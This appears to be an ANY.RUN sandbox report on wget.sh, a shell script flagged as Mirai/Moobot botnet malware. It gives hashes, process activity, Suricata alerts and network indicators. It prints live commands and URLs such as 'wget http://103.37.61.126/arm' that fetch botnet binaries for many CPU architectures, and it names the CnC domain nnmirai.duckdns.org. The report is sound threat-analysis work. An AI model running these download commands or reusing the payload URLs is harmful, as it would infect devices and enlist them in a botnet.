File name:

wget.sh

Full analysis: https://app.any.run/tasks/6af66d51-54a5-46ce-a502-445e72a5dccb
Verdict: Malicious activity
Threats:

A botnet is a group of internet-connected devices that are controlled by a single individual or group, often without the knowledge or consent of the device owners. These devices can be used to launch a variety of malicious attacks, such as distributed denial-of-service (DDoS) attacks, spam campaigns, and data theft. Botnet malware is the software that is used to infect devices and turn them into part of a botnet.

Malware Trends Tracker     >>>
Analysis date: May 15, 2025, 10:28:46
OS: Ubuntu 22.04.2
Tags:
mirai
botnet
moobot
Indicators:
MIME: text/plain
File info: ASCII text
MD5:

1306A3632D7EA57B423C515D318503F3

SHA1:

6B127FE5478ED02C096586AE330F0C7366F93C6B

SHA256:

F830A78B46BEA7141D7D5C8B4DC1E60B3B2D4C371820E209751CEFF33E35E0F3

SSDEEP:

12:nj+ReLq+2NIl5zA+b0LKj+COs++C+A/+iVcSE+EtaKA++j+qd/iA+qdtfAUn:nB2NI7gKrZYHVcPtBGd/xdhxn

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Connects to the CnC server

      • x86_64 (PID: 39572)
      • x86 (PID: 39565)

    • MIRAI has been detected (SURICATA)

      • x86_64 (PID: 39572)
      • x86 (PID: 39565)

  • SUSPICIOUS

    • Executes commands using command-line interpreter

      • sudo (PID: 39497)

    • Modifies file or directory owner

      • sudo (PID: 39494)

    • Potential Corporate Privacy Violation

      • wget (PID: 39500)
      • wget (PID: 39508)
      • wget (PID: 39519)
      • wget (PID: 39523)
      • wget (PID: 39527)
      • wget (PID: 39546)
      • wget (PID: 39550)
      • wget (PID: 39554)
      • wget (PID: 39542)
      • wget (PID: 39567)
      • wget (PID: 39561)

    • Uses wget to download content

      • bash (PID: 39498)

    • Connects to the server without a host name

      • wget (PID: 39500)
      • wget (PID: 39508)
      • wget (PID: 39523)
      • wget (PID: 39519)
      • wget (PID: 39527)
      • wget (PID: 39554)
      • wget (PID: 39546)
      • wget (PID: 39550)
      • wget (PID: 39561)
      • wget (PID: 39558)
      • wget (PID: 39542)
      • wget (PID: 39567)

    • Executes the "rm" command to delete files or directories

      • bash (PID: 39498)

    • Contacting a server suspected of hosting an CnC

      • x86_64 (PID: 39572)
      • x86 (PID: 39565)

    • Connects to unusual port

      • x86_64 (PID: 39572)
      • x86 (PID: 39565)

  • INFO

    • Checks timezone

      • wget (PID: 39508)
      • wget (PID: 39500)
      • wget (PID: 39519)
      • wget (PID: 39523)
      • wget (PID: 39527)
      • wget (PID: 39542)
      • wget (PID: 39550)
      • wget (PID: 39554)
      • wget (PID: 39558)
      • wget (PID: 39561)
      • wget (PID: 39567)
      • wget (PID: 39546)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
289
Monitored processes
71
Malicious processes
7
Suspicious processes
7

Behavior graph

Click at the process to see the details
start dash no specs sudo no specs chown no specs chmod no specs sudo no specs bash no specs locale-check no specs wget systemctl no specs systemctl no specs systemctl no specs chmod no specs bash no specs wget tracker-extract-3 no specs chmod no specs bash no specs wget chmod no specs bash no specs wget chmod no specs bash no specs wget chmod no specs bash no specs wget chmod no specs bash no specs wget chmod no specs bash no specs wget chmod no specs bash no specs wget chmod no specs bash no specs wget chmod no specs bash no specs wget chmod no specs x86 no specs #MIRAI x86 wget x86 no specs x86 no specs chmod no specs x86_64 no specs rm no specs #MIRAI x86_64 x86_64 no specs x86_64 no specs tracker-extract-3 no specs x86 no specs x86_64 no specs x86 no specs x86_64 no specs x86 no specs x86_64 no specs cron no specs dash no specs x86 no specs x86_64 no specs x86 no specs x86_64 no specs x86 no specs x86_64 no specs x86 no specs x86_64 no specs

Process information

PID
CMD
Path
Indicators
Parent process
39493/bin/sh -c "sudo chown user /tmp/wget\.sh && chmod +x /tmp/wget\.sh && DISPLAY=:0 sudo -iu user /tmp/wget\.sh "/usr/bin/dashany-guest-agent
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
39494sudo chown user /tmp/wget.sh/usr/bin/sudodash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
39495chown user /tmp/wget.sh/usr/bin/chownsudo
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
39496chmod +x /tmp/wget.sh/usr/bin/chmoddash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
39497sudo -iu user /tmp/wget.sh/usr/bin/sudodash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
39498-bash --login -c \/tmp\/wget\.sh/usr/bin/bashsudo
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
39499/usr/bin/locale-check C.UTF-8/usr/bin/locale-checkbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
39500wget http://103.37.61.126/arm/usr/bin/wget
bash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
39501systemctl --user --global is-enabled snap.snapd-desktop-integration.snapd-desktop-integration.service/usr/bin/systemctlsnapd
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
39502systemctl --user --global is-enabled snap.snapd-desktop-integration.snapd-desktop-integration.service/usr/bin/systemctlsnapd
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Executable files
0
Suspicious files
11
Text files
0
Unknown types
0

Dropped files

PID
Process
Filename
Type
39500wget/home/user/armbinary
MD5:
SHA256:
39508wget/home/user/arm5binary
MD5:
SHA256:
39519wget/home/user/arm6binary
MD5:
SHA256:
39523wget/home/user/arm7binary
MD5:
SHA256:
39527wget/home/user/m68kbinary
MD5:
SHA256:
39542wget/home/user/mipsbinary
MD5:
SHA256:
39546wget/home/user/mpslbinary
MD5:
SHA256:
39550wget/home/user/ppcbinary
MD5:
SHA256:
39554wget/home/user/sh4binary
MD5:
SHA256:
39561wget/home/user/x86binary
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
14
TCP/UDP connections
34
DNS requests
28
Threats
76

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
39519
wget
GET
200
103.37.61.126:80
http://103.37.61.126/arm6
unknown
unknown
39500
wget
GET
200
103.37.61.126:80
http://103.37.61.126/arm
unknown
unknown
39508
wget
GET
200
103.37.61.126:80
http://103.37.61.126/arm5
unknown
unknown
GET
204
91.189.91.98:80
http://connectivity-check.ubuntu.com/
unknown
whitelisted
GET
204
91.189.91.98:80
http://connectivity-check.ubuntu.com/
unknown
whitelisted
39523
wget
GET
200
103.37.61.126:80
http://103.37.61.126/arm7
unknown
unknown
39527
wget
GET
200
103.37.61.126:80
http://103.37.61.126/m68k
unknown
unknown
39554
wget
GET
200
103.37.61.126:80
http://103.37.61.126/sh4
unknown
unknown
39542
wget
GET
200
103.37.61.126:80
http://103.37.61.126/mips
unknown
unknown
39546
wget
GET
200
103.37.61.126:80
http://103.37.61.126/mpsl
unknown
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
91.189.91.98:80
Canonical Group Limited
US
unknown
484
avahi-daemon
224.0.0.251:5353
unknown
169.150.255.180:443
odrs.gnome.org
GB
whitelisted
512
snapd
185.125.188.54:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted
39500
wget
103.37.61.126:80
nnmirai.duckdns.org
malicious
39508
wget
103.37.61.126:80
nnmirai.duckdns.org
malicious
39519
wget
103.37.61.126:80
nnmirai.duckdns.org
malicious
39523
wget
103.37.61.126:80
nnmirai.duckdns.org
malicious
39527
wget
103.37.61.126:80
nnmirai.duckdns.org
malicious
39542
wget
103.37.61.126:80
nnmirai.duckdns.org
malicious

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.186.46
  • 2a00:1450:4001:808::200e
whitelisted
odrs.gnome.org
  • 169.150.255.180
  • 195.181.170.19
  • 212.102.56.178
  • 169.150.255.184
  • 207.211.211.26
  • 195.181.175.41
  • 37.19.194.80
  • 2a02:6ea0:c700::11
  • 2a02:6ea0:c700::18
  • 2a02:6ea0:c700::101
  • 2a02:6ea0:c700::112
  • 2a02:6ea0:c700::107
  • 2a02:6ea0:c700::21
  • 2a02:6ea0:c700::19
whitelisted
api.snapcraft.io
  • 185.125.188.54
  • 185.125.188.57
  • 185.125.188.59
  • 185.125.188.58
  • 2620:2d:4000:1010::117
  • 2620:2d:4000:1010::2e6
  • 2620:2d:4000:1010::344
  • 2620:2d:4000:1010::42
whitelisted
6.100.168.192.in-addr.arpa
unknown
nnmirai.duckdns.org
  • 103.37.61.126
  • 160.250.180.181
malicious
connectivity-check.ubuntu.com
  • 2620:2d:4002:1::198
  • 2620:2d:4000:1::97
  • 2620:2d:4002:1::196
  • 2001:67c:1562::24
  • 2620:2d:4000:1::2b
  • 2620:2d:4000:1::96
  • 2620:2d:4000:1::22
  • 2620:2d:4000:1::23
  • 2620:2d:4000:1::98
  • 2001:67c:1562::23
  • 2620:2d:4000:1::2a
whitelisted

Threats

PID
Process
Class
Message
39500
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
39508
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
39519
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
39523
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
39527
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
39542
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
39546
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
39550
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
39554
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
39565
x86
Potentially Bad Traffic
ET DYN_DNS DYNAMIC_DNS Query to a *.duckdns .org Domain
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
wget.sh